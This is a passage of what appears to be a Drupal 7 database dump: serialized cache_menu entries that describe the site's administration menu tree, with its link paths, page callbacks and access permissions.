pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658880,1),('links:management:tree-data:en:09bc82c9ca1d7556a24149515bfb07a41d387c78c7e7b30eb983f4ae4705a30f','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:4:{i:44;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"44\";s:4:\"plid\";s:2:\"16\";s:9:\"link_path\";s:18:\"admin/modules/list\";s:11:\"router_path\";s:18:\"admin/modules/list\";s:10:\"link_title\";s:4:\"List\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:2:\"44\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:60;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"60\";s:4:\"plid\";s:2:\"16\";s:9:\"link_path\";s:23:\"admin/modules/uninstall\";s:11:\"router_path\";s:23:\"admin/modules/uninstall\";s:10:\"link_title\";s:9:\"Uninstall\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:2:\"60\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:42:\"a:1:{i:0;s:24:\"system_modules_uninstall\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:9:\"Uninstall\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:262;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"262\";s:4:\"plid\";s:2:\"16\";s:9:\"link_path\";s:20:\"admin/modules/update\";s:11:\"router_path\";s:20:\"admin/modules/update\";s:10:\"link_title\";s:6:\"Update\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:3:\"262\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"module\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:6:\"Update\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:263;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"263\";s:4:\"plid\";s:2:\"16\";s:9:\"link_path\";s:21:\"admin/modules/install\";s:11:\"router_path\";s:21:\"admin/modules/install\";s:10:\"link_title\";s:18:\"Install new module\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"25\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:3:\"263\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:62:\"a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"module\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:18:\"Install new module\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration 